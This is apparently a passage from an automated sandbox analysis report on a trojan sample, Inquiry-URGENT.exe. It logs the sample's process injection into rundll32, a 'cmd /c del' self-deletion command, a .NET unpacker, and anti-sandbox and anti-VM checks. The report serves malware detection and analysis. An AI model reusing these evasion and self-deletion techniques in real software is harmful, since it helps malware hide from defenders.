          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B880A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B86DA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B878A NtAllocateVirtualMemory,
          Source: Inquiry-URGENT.exeBinary or memory string: OriginalFilename vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.670471752.0000000000712000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.675364064.0000000005BE0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000002.00000002.671314085.0000000002BBB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exeBinary or memory string: OriginalFilename vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000000.669340059.00000000005D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000002.754490731.000000000307C000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exeBinary or memory string: OriginalFilenameResourceTableMappingEntryField.exeP vs Inquiry-URGENT.exe
          Source: Inquiry-URGENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Inquiry-URGENT.exeVirustotal: Detection: 36%
          Source: Inquiry-URGENT.exeMetadefender: Detection: 22%
          Source: Inquiry-URGENT.exeReversingLabs: Detection: 71%
          Source: Inquiry-URGENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Inquiry-URGENT.exe 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry-URGENT.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/7
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Inquiry-URGENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Inquiry-URGENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe, 00000008.00000002.939331902.0000000004C0F000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdbGCTL source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Inquiry-URGENT.exe, Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.Inquiry-URGENT.exe.710000.0.unpack, Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.Inquiry-URGENT.exe.710000.0.unpack, Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.Inquiry-URGENT.exe.5d0000.0.unpack, Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.Inquiry-URGENT.exe.5d0000.1.unpack, Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041B85C push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004150E3 push ebp; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00415479 pushad ; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0040453C pushfd ; iretd
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00415F0E push cs; retf
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041B7F2 push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041B7FB push eax; ret
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_0041B7A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B50E3 push ebp; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB85C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B5479 pushad ; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009A453C pushfd ; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7FB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009BB7F2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_009B5F0E push cs; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.57244291129

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.671240839.0000000002B43000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Inquiry-URGENT.exe PID: 6760, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000009A8604 second address: 00000000009A860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000009A898E second address: 00000000009A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe TID: 6524Thread sleep time: -35643s >= -30000s
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1376Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread delayed: delay time: 35643
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread delayed: delay time: 922337203685477
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.685379335.000000000FD39000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.701826310.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.713882043.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.701826310.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.682261629.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAb
          Source: explorer.exe, 00000005.00000000.711242824.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.701954450.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.722279904.000000000FD5D000.00000004.00000001.sdmpBinary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.718318971.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Inquiry-URGENT.exe, 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE0EA5 mov eax, dword ptr fs:[00000030h]
